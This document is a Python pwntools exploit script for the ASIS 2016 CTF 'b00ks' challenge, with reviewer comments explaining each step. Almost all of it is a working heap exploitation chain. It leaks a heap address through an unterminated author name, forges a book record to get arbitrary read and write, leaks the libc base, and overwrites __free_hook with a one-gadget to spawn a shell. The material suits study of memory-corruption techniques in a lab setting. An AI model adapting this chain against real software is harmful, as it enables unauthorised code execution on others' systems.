ASIS_2016_books

off_by_one

from pwn import *
 
def create(name_size,content,des_size,content2):
    """Drive menu option ``1`` through the module-level ``sla`` helper.

    Sends ``'1'`` at the ``>`` prompt, then answers the next four ``:``
    prompts, in order, with ``str(name_size)``, ``content``,
    ``str(des_size)`` and ``content2``. The sizes are stringified here; the
    two content arguments are sent exactly as given. Presumably this is the
    "add a book" entry of the target's menu — confirm against the binary.
    """
    sla('>', '1')
    replies = (str(name_size), content, str(des_size), content2)
    for reply in replies:
        sla(':', reply)
 
def edit(ids,des):
    """Drive menu option ``3`` through the module-level ``sla`` helper.

    Sends ``'3'`` at the ``>`` prompt, then ``str(ids)`` and ``des`` at the
    two following ``:`` prompts. Callers in this file pass a book index and a
    raw description payload, so ``des`` is sent unmodified.
    """
    exchange = (('>', '3'), (':', str(ids)), (':', des))
    for prompt, reply in exchange:
        sla(prompt, reply)
 
def delete(ids):
    """Drive menu option ``2`` through the module-level ``sla`` helper.

    Sends ``'2'`` at the ``>`` prompt and ``str(ids)`` at the following
    ``:`` prompt.
    """
    exchange = (('>', '2'), (':', str(ids)))
    for prompt, reply in exchange:
        sla(prompt, reply)
 
def show():
    """Select menu option ``4`` at the ``>`` prompt via the module-level ``sla``.

    Nothing is read back here; callers consume the output themselves with
    ``ru``.
    """
    menu_choice = '4'
    sla('>', menu_choice)
 
def change_name(name):
    """Drive menu option ``5`` through the module-level ``sla`` helper.

    Sends ``'5'`` at the ``>`` prompt and ``name`` unmodified at the
    following ``:`` prompt.
    """
    exchange = (('>', '5'), (':', name))
    for prompt, reply in exchange:
        sla(prompt, reply)
 
# Local run only: spawn ./b00ks, load its ELF and let pwntools resolve the
# libc it links against. The offsets hard-coded further down (0x3c4b78,
# 0x4526a) tie this script to one specific libc build.
r=process('./b00ks')
e=ELF('./b00ks')
libc=e.libc

# Thin aliases over the pwntools tube. ``sa`` is defined but never used in
# this script.
sla = lambda x,y : r.sendlineafter(x,y)
ru = lambda x : r.recvuntil(x)
sa = lambda x,y : r.sendafter(x,y)

# First ':' prompt: the author name, filled to exactly 0x20 bytes. show()
# below echoes it as 'Author: ' followed by those 32 'A's.
sla(':','A'*0x20)

# Two books, each with a 0x80-byte name and description holding 0x7f bytes.
create(0x80,'A'*0x7f,0x80,'A'*0x7f)
create(0x80,'B'*0x7f,0x80,'B'*0x7f)

# Heap leak: whatever the program prints after the 32-byte author name on
# the same line is parsed as a little-endian pointer (padded with two NUL
# bytes for u64) and rebased by a hard-coded 0x140.
# NOTE(review): this only works because the name is printed without a NUL
# separating it from the adjacent pointer — presumably the off-by-one named
# in the page title; the defect itself lives in the binary, not here.
# NOTE(review): ``str + '\x00\x00'`` on a recvuntil() result is Python 2
# pwntools; under Python 3 recvuntil returns bytes and this raises TypeError.
show()
ru('Author: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')
heap=u64(ru('\n').replace('\n','')+'\x00\x00')-0x140
log.info(hex(heap))

delete(2)

# Write a fabricated record into book 1's description: 0x50 bytes of filler,
# then what looks like (id=1, name ptr, description ptr, size). The 0x170 and
# 0xb0 offsets are hard-coded for this build's heap layout — TODO confirm
# against the program's book struct.
edit(1,'A'*0x50+p64(1)+p64(heap+0x170)+p64(heap+0xb0)+p64(0x80))

# NOTE(review): after this call show() returns the fabricated record, so the
# name change presumably redirects the program's book pointer to it; the
# mechanism is not visible in this script — confirm against the binary.
change_name('A'*0x20)

# libc leak through the fabricated record: read up to the first '\x7f' byte
# (presumably the top byte of the leaked libc address), pad, and subtract a
# libc-specific constant to obtain the base. ``oneshot`` is a hard-coded
# gadget offset for the same libc build.
show()
ru('Name: ')
libc_leak=u64(ru('\x7f')+'\x00\x00')-0x3c4b78
oneshot=libc_leak+0x4526a
log.info(hex(libc_leak))

# Re-point the fabricated record's description pointer at __free_hook ...
edit(1,'A'*0x50+p64(1)+p64(heap+0x170)+p64(libc_leak+libc.symbols['__free_hook'])+p64(0x80))

# ... so that editing book 1 writes ``oneshot`` into __free_hook, and the
# free() triggered by delete(1) dispatches through it. From a hardening
# standpoint the chain depends on two things fixable in the binary: the
# unterminated author name (the leak) and the unchecked record layout that
# the edit above turns into an arbitrary write.
edit(1,p64(oneshot))
delete(1)
r.interactive()